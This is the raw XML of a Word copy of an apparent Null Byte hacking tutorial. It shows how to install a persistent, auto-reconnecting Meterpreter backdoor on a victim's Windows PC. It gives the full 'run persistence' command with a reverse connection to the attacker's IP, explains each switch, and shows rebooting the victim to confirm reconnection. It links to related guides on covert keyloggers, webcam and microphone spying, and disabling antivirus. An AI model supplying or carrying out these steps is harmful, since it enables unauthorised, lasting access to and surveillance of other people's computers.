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6A" w:rsidRPr="00C43E6A" w:rsidRDefault="00C43E6A" w:rsidP="00C43E6A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C43E6A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C43E6A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"https://null-byte.wonderhowto.com/how-to/hack-like-pro-remotely-install-auto-reconnecting-persistent-back-door-someones-pc-0144576/" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C43E6A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r w:rsidRPr="00C43E6A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Auto-Reconnecting Persistent Back Door on Someone's PC</w:t>
      </w:r>
      <w:r w:rsidRPr="00C43E6A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:rsidR="00C43E6A" w:rsidRPr="00C43E6A" w:rsidRDefault="00C43E6A" w:rsidP="00C43E6A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43E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BY </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00C43E6A">
          <w:rPr>
            <w:rFonts w:ascii="Arial Narrow" w:eastAsia="Times New Roman" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="888888"/>
            <w:spacing w:val="2"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>OCCUPYTHEWEB</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C43E6A" w:rsidRPr="00C43E6A" w:rsidRDefault="00C43E6A" w:rsidP="00C43E6A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43E6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> 03/16/2013 12:35 AM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C43E6A" w:rsidRPr="00C43E6A" w:rsidRDefault="00C43E6A" w:rsidP="00C43E6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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6" w:history="1">
        <w:r w:rsidRPr="00C43E6A">
          <w:rPr>
            <w:rFonts w:ascii="Arial Narrow" w:eastAsia="Times New Roman" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
            <w:color w:val="888888"/>
            <w:spacing w:val="2"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>HACK LIKE A PRO</w:t>
        </w:r>
      </w:hyperlink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Welcome back, my hacker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wannabees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Most of my recent posts have addressed using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Metasploit's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what we can do once we have embedded it on the victim's system. This includes remotely installing </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00C43E6A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 xml:space="preserve">a </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00C43E6A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keylogger</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink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, enabling </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00C43E6A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the webcam</w:t>
        </w:r>
      </w:hyperlink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, enabling </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00C43E6A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the microphone and recording</w:t>
        </w:r>
      </w:hyperlink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, disabling </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00C43E6A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the antivirus software</w:t>
        </w:r>
      </w:hyperlink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, among many other things. The list is almost unlimited.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Unfortunately,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ceases to work if the victim system is rebooted. As a result, many of you have written me asking whether we can maintain or persist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on the victim system.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 answer is an unequivocal "Yes!"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 can embed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then come back later—even after the victim's computer has been rebooted—and reconnect to our little backdoor or listener. I'm dedicating this post to showing you how to do this.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C43E6A" w:rsidRPr="00C43E6A" w:rsidRDefault="00C43E6A" w:rsidP="00C43E6A">
      <w:pPr>
        <w:spacing w:after="12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C43E6A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Getting Started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Let's assume that you have been successful in embedding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on the victim's system, and that you have a screen that looks like the screenshot below. If you're not sure how to do this, check out some of </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00C43E6A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my previous posts</w:t>
        </w:r>
      </w:hyperlink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for help.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C43E6A" w:rsidRPr="00C43E6A" w:rsidRDefault="00C43E6A" w:rsidP="00C43E6A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8286750" cy="6191250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Picture 4" descr="https://img.wonderhowto.com/img/44/41/63498943254537/0/hack-like-pro-remotely-install-auto-reconnecting-persistent-back-door-someones-pc.w1456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44/41/63498943254537/0/hack-like-pro-remotely-install-auto-reconnecting-persistent-back-door-someones-pc.w1456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Now, let's get started.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C43E6A" w:rsidRPr="00C43E6A" w:rsidRDefault="00C43E6A" w:rsidP="00C43E6A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C43E6A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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C43E6A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Run the Persistence Script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has a script named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persistence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 that can enable us to set up a persistent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(listener) on the victim's system. First let's take a look at the options that are available when we run this scrip by using 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–h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At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prompt, type the following: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proofErr w:type="gramStart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lastRenderedPageBreak/>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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&gt; run persistence -h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C43E6A" w:rsidRPr="00C43E6A" w:rsidRDefault="00C43E6A" w:rsidP="00C43E6A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7029450" cy="4276725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="3" name="Picture 3" descr="https://img.wonderhowto.com/img/86/64/63498943267235/0/hack-like-pro-remotely-install-auto-reconnecting-persistent-back-door-someones-pc.w1456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86/64/63498943267235/0/hack-like-pro-remotely-install-auto-reconnecting-persistent-back-door-someones-pc.w1456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We can see in the screenshot above that...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–A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starts a matching handler to connect to the agent.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With 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-L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 we tell the system where to place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on the target system.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–P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tells the system what payload to use (Windows/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/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reverse_tcp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is the default, so we won't use this switch).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-S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starts the agent on boot with system privileges.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-U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starts the agent when the user (U) logs on.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-x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starts the agent when the system boots.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With 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–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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we can indicate the time interval between each connection attempt.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-p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indicates the port, and finally...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C43E6A" w:rsidRPr="00C43E6A" w:rsidRDefault="00C43E6A" w:rsidP="00C43E6A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–r switch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 indicates the IP address of our </w:t>
      </w:r>
      <w:proofErr w:type="gram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( r</w:t>
      </w:r>
      <w:proofErr w:type="gram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) system running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>Here we will use the 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–A, -L, -x, -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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, -p, and –r switches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Type at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prompt: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proofErr w:type="gramStart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meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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&gt;run persistence –A –L c:\\ -X 30 –p 443 –r 192.168.1.113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This command then will run the persistence script that will start a matching handler (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-A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), place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at c:\\ on the target system (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-L </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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c:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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\\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), starts the listener when the system boots (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-x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), checks every 30 seconds for a connection (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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 30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), connects on port 443 (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-p 443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), and connects to the local system (</w:t>
      </w:r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ours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 on IP address 192.168.1.113.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When we run this command, this is what we should see.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C43E6A" w:rsidRPr="00C43E6A" w:rsidRDefault="00C43E6A" w:rsidP="00C43E6A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7029450" cy="4314825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2" name="Picture 2" descr="https://img.wonderhowto.com/img/88/96/63498943280417/0/hack-like-pro-remotely-install-auto-reconnecting-persistent-back-door-someones-pc.w1456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wonderhowto.com/img/88/96/63498943280417/0/hack-like-pro-remotely-install-auto-reconnecting-persistent-back-door-someones-pc.w1456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6A" w:rsidRPr="00C43E6A" w:rsidRDefault="00C43E6A" w:rsidP="00C43E6A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C43E6A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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C43E6A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Opening a Second Session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 can see that we have opened a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session on the victim system.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 return to our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prompt, by typing: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proofErr w:type="gramStart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lastRenderedPageBreak/>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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&gt; background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This will return us to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C43E6A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 prompt</w:t>
      </w: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, where can now type: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proofErr w:type="gramStart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msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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exploit(ms08_067_netapi) &gt; sessions –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C43E6A" w:rsidRPr="00C43E6A" w:rsidRDefault="00C43E6A" w:rsidP="00C43E6A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7239000" cy="2724150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="https://img.wonderhowto.com/img/10/76/63498943290667/0/hack-like-pro-remotely-install-auto-reconnecting-persistent-back-door-someones-pc.w1456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wonderhowto.com/img/10/76/63498943290667/0/hack-like-pro-remotely-install-auto-reconnecting-persistent-back-door-someones-pc.w1456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 see above that now we have two or more sessions running on the victim system (I actually have three sessions running on this victim) as the persistent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has opened a second session on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C43E6A" w:rsidRPr="00C43E6A" w:rsidRDefault="00C43E6A" w:rsidP="00C43E6A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C43E6A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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00C43E6A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Testing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This is all very nice, but the key here is whether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will reconnect to our system even after the target system reboots. We can test this by typing;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C43E6A" w:rsidRPr="00C43E6A" w:rsidRDefault="00C43E6A" w:rsidP="00C43E6A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proofErr w:type="gramStart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meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C43E6A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&gt; reboot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This will reboot the target/victim machine and if we are successful,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will reconnect to our system.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Even after the system reboots, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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on the victim system attempts to connect to us every 30 seconds until it has successfully open a session for us.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C43E6A" w:rsidRPr="00C43E6A" w:rsidRDefault="00C43E6A" w:rsidP="00C43E6A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C43E6A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we have successfully opened a persistent connection on the victim system that we can come back to time and time again to wreak havoc!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C43E6A" w:rsidRPr="00C43E6A" w:rsidRDefault="00C43E6A" w:rsidP="00C43E6A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing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t>Original cover images from </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00C43E6A">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="A8A8A8"/>
            <w:spacing w:val="2"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Brian A Jackson</w:t>
        </w:r>
      </w:hyperlink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t>, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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fldChar w:fldCharType="begin"/>
      </w:r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instrText xml:space="preserve"> HYPERLINK "http://www.shutterstock.com/pic-127479617/stock-photo-green-matrix-background-computer-generated.html" \t "_blank" </w:instrText>
      </w:r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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00C43E6A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="A8A8A8"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>ilovezion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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fldChar w:fldCharType="end"/>
      </w:r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t> at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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fldChar w:fldCharType="begin"/>
      </w:r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instrText xml:space="preserve"> HYPERLINK "http://www.shutterstock.com/" \t "_blank" </w:instrText>
      </w:r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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00C43E6A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="A8A8A8"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Shutterstock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C43E6A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="A8A8A8"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00522B39" w:rsidRDefault="00C43E6A">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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61D8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E2E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779E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="296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6A"/>
    <w:rsid w:val="002512D0"/>
    <w:rsid w:val="00C43E6A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FF0AE-2D64-4185-8FD9-BBB23041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E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3E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3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C43E6A"/>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00C43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217">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="450"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="23" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="23" w:color="auto"/>
            <w:bottom w:val="single" w:sz="24" w:space="23" w:color="7ABD13"/>
            <w:right w:val="none" w:sz="0" w:space="23" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="104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l-byte.wonderhowto.com/how-to/hack-like-pro-secretly-hack-into-switch-on-watch-anyones-webcam-remotely-0142514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img.wonderhowto.com/img/original/10/76/63498943290667/0/634989432906671076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ull-byte.wonderhowto.com/how-to/hack-like-pro-remotely-install-keylogger-onto-your-girlfriends-computer-0141971/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/44/41/63498943254537/0/634989432545374441.jpg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img.wonderhowto.com/img/original/88/96/63498943280417/0/634989432804178896.jpg" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.shutterstock.com/pic-127242269/stock-photo-tin-can-telephone-through-laptop-screen-concept-for-internet-phone-or-voice-over-i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hack-like-a-pro/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wonderhowto.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://creator.wonderhowto.com/occupythewebotw/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null-byte.wonderhowto.com/how-to/hack-like-pro-kill-and-disable-antivirus-software-remote-pc-0141906/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null-byte.wonderhowto.com/how-to/hack-like-pro-remotely-record-listen-microphone-anyones-computer-0143966/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/86/64/63498943267235/0/634989432672358664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2018-11-23T21:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-23T21:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>